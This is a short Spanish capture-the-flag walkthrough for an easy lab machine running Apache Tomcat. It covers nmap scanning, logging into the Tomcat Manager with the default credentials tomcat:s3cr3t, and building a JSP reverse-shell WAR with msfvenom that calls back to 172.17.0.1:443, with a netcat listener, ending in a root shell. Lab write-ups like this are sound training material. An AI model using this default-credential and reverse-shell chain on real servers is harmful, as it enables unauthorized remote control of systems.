-Pn

✍️ Autor: El Pingüino de Mario🔍 Dificultad: Fácil 📅 Fecha de creación: 02/04/2024

🔍 RECONOCIMIENTO

En primer lugar, tras conectarnos a la máquina, utilizamos el comando:

ping -c 1 172.17.0.2

para verificar la conectividad de red.

A continuación, realizamos el comando:

nmap -sVC -p- -n --min-rate 5000 172.17.0.2

para realizar un escaneo de puertos y servicios detallado en la dirección IP.

Como podemos observar durante el escaneo que el puerto 8080 perteneciente al servicio HTTP está abierto por lo que a continuación se indagará más.

🔎 EXPLORACIÓN

Se utiliza el comando:

sudo nmap -sCV -p8080 -v 172.17.0.2

para que nos proporcione más información sobre esos puertos específicamente.

Seguimos indagando más sobre los puertos y ahora indagamos sobre el servicio HTTP. Se ingresó la dirección IP en el navegador lo que llevó a que la página web sea un Apache Tomcat.

Vamos a Manager App y nos pide unas credenciales. A través de esta página nos indica las credenciales por defecto y cómo vulnerar esta versión. Las credenciales fueron tomcat:s3cr3t.

🚀 EXPLOTACIÓN

Subimos una Reverse Shell.

msfvenom -p java/jsp_shell_reverse_tcp LHOST=172.17.0.1 LPORT=443 -f war -o reverse.war

Nos ponemos en escucha.

nc -lvnp 443

🔐 PRIVILEGIOS

Al estar dentro y ejecutar:

whoami

y somos root.

Last updated

Was this helpful?